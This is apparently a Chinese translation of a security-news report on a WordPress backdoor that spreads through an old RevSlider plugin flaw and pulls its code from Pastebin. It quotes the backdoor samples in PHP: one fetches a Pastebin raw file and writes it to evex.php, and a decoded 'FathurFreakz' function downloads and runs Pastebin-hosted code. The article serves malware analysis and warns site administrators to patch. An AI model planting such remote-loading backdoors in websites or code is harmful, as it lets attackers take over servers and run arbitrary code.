压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

惡意軟件新玩法:隱匿在Pastebin上的后門(mén)

  快速分享文本、代碼的網(wǎng)站Pastebin常常被黑客們用來(lái)分享自己的庫(kù)、竊取的數(shù)據(jù)和其他代碼,而現(xiàn)在它真的被用于黑客攻擊了。

  安全研究人員曾發(fā)現(xiàn)黑客們通過(guò)Gmail 草稿、Evernote等平臺(tái)控制僵尸網(wǎng)絡(luò),而且近日又發(fā)現(xiàn)一個(gè)新玩法 :黑客利用流行的WordPress插件RevSlider的老版本漏洞傳播新的后門(mén)變種,使用Pastebin.com放置惡意軟件。下面就讓我們一起來(lái)看看黑客們的新創(chuàng)意吧。

  另類(lèi)后門(mén)

  Sucuri公司近日發(fā)表了一篇博客,該博客詳細(xì)解釋了黑客是如何利用舊版本的RevSlider WordPress插件來(lái)傳播一種新型后門(mén),而該后門(mén)利用Pastebin.com網(wǎng)站服務(wù)來(lái)托管惡意代碼文件。

  惡意軟件高級(jí)研究員Denis Sinegubko在博客中寫(xiě)道:

  “這或多或少可以算得上是一個(gè)典型的后門(mén)。它從遠(yuǎn)程服務(wù)器下載惡意代碼,并在受害網(wǎng)站上將這些惡意代碼保存到一個(gè)文件中,使其隨時(shí)可被執(zhí)行。不過(guò),比較有趣的一點(diǎn)是其遠(yuǎn)程服務(wù)器的選擇,黑客既沒(méi)將惡意代碼文件托管在自己的網(wǎng)站,也不是肉雞網(wǎng)站,而是在最受歡迎的Web應(yīng)用網(wǎng)站Pastebin.com上。”

  攻擊者通過(guò)掃描目標(biāo)網(wǎng)站來(lái)尋找含有漏洞的RevSlider插件。一旦發(fā)現(xiàn),他們會(huì)利用RevSlider的另一個(gè)漏洞將后門(mén)代碼上傳到該網(wǎng)站。

  if(array_keys($_GET)[0] == 'up'){

  $content = file_get_contents("http://pastebin.com/raw.php?i=JK5r7NyS");

  if($content){unlink('evex.php');

  $fh2 = fopen("evex.php",'a');

  fwrite($fh2,$content);

  fclose($fh2);

  }}else{print "test";}

  關(guān)鍵后門(mén)代碼

  這是一份稍微復(fù)雜點(diǎn)的后門(mén)樣本,是通過(guò)RevSlider漏洞上傳的:

  從截圖中你可以看到這段代碼將一段經(jīng)過(guò)Base64編碼的內(nèi)容注入WordPress核心文件wp-links-opml.php中的$temp變量。以下是經(jīng)過(guò)解密的$temp內(nèi)容:

  你可以看到它從Pastebin下載代碼并立即執(zhí)行。但這次只有當(dāng)攻擊者提供wp_nonce_once中的請(qǐng)求參數(shù),也就是Pastebin的文章ID時(shí)才會(huì)運(yùn)行。wp_nonce_once參數(shù)的使用使得管理員難以追蹤惡意代碼的具體地址(防止了網(wǎng)址被屏蔽),同時(shí)又增加了后門(mén)的靈活性———這樣它就能夠下載執(zhí)行任何Pastebin上的代碼——哪怕是那些一開(kāi)始不存在的代碼————只需要向wp-links-opml.php提供ID就行了。

  FathurFreakz編碼器

  印度尼西亞黑客們有一款編碼器與Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com網(wǎng)站上粘帖創(chuàng)建PHP代碼,軟件就會(huì)加密那個(gè)Pastebin網(wǎng)址,生成混淆后的代碼:

  解密后:

  function FathurFreakz($ct3){

  xcurl('http://pastebin.com/download.php?i='.code($ct3));

  }

  FathurFreakz(CODE);

  這段代碼會(huì)下載執(zhí)行Pastebin上的代碼(使用xcurl函數(shù)),ID在CODE常量中,并且經(jīng)過(guò)加密。你可以看到另外一種Pastebin網(wǎng)址種類(lèi):download.php,基本上它跟raw.php一樣,但它提供HTTP頭,使得瀏覽器不會(huì)顯示內(nèi)容,而是直接以文件形式下載。

  經(jīng)過(guò)解密的代碼(看起來(lái)他們超愛(ài)用Pastebin……):

  給站長(zhǎng)們敲響警鐘

  黑客在實(shí)時(shí)攻擊的時(shí)候大規(guī)模利用Pastebin網(wǎng)站,這給網(wǎng)站管理員敲響了警鐘,提示他們要時(shí)刻維護(hù)網(wǎng)站的CMS(內(nèi)容管理系統(tǒng))以防止插件被惡意利用。

  就在幾周前,一款新型針對(duì)WordPress的惡意軟件SoakSoak,其主要攻擊手段也是通過(guò)RevSlider的漏洞,上傳一個(gè)后門(mén),然后對(duì)所有使用相同服務(wù)器的網(wǎng)站進(jìn)行感染。當(dāng)時(shí)SoakSoak攻陷了約10萬(wàn)個(gè)WordPress站。

 

上一篇:智能無(wú)懼挑戰(zhàn) 山石網(wǎng)科轟動(dòng)RSA2015

下一篇:Arp欺騙原理及Android環(huán)境下的檢測(cè)方法